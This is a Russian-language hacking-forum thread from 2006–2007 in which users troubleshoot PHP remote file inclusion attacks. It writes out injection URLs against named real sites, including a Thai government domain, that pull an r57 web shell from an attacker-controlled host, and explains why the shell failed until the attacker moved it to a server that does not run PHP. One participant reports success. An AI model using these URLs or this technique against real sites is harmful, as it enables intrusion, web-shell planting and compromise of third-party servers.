Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   PHP-injection (https://forum.antichat.xyz/showthread.php?t=25344)

banall 14.10.2006 05:12

PHP-injection
 
Кароче при запросе http://zhertva.com/index.php?page=http://site.ru/r57shell.txt

выдает
Warning: main(http:site.ru/r57shell.txt)

куда деваются слэши? Что делать?

ShAnKaR 14.10.2006 12:23

фильтры в скрипте стоят от таких как ты

of69 29.04.2007 08:11

народ чего за ботва, чёйто йа не фкуриваю

нашол пару сайтов вродебы с иньекциями

http://www.orfw.org/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=
http://www.m-culture.go.th/nan/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=

там замудрёно заинклудил шелл - там в конце дописывается /styles//error.php
ну я создал у ся на сайте диру styles а в ней файл error.php кодом шелла ( r57 )

тоесть получилось так
http://мой_сайт/styles/error.php

заинклудил таким обраом

http://www.m-culture.go.th/nan/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://мой_сайт/

норм шелл отображается, но показывает диру на МОЁМ сайтенге и отказывается что либо выполнять...

Обьясните плиззз что нетак я делаю и почему ничего неполучается, и как надо правельно?

n1†R0x 29.04.2007 08:54

хмм.. у тебя лаги какие-то.
Код:

http://www.m-culture.go.th/nan/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://f4st.hotmail.ru
все норм.

of69 29.04.2007 10:00

перезалил на другой хост - терь всё работает, пасиб)

Digimortal 29.04.2007 10:19

>> норм шелл отображается, но показывает диру на МОЁМ сайтенге и отказывается что либо выполнять...

может, потому что на твоем сайте php поддерживается? )

of69 29.04.2007 11:09

>>может, потому что на твоем сайте php поддерживается? )

ну... эээ...

/me ушол пить йат...


Время: 15:02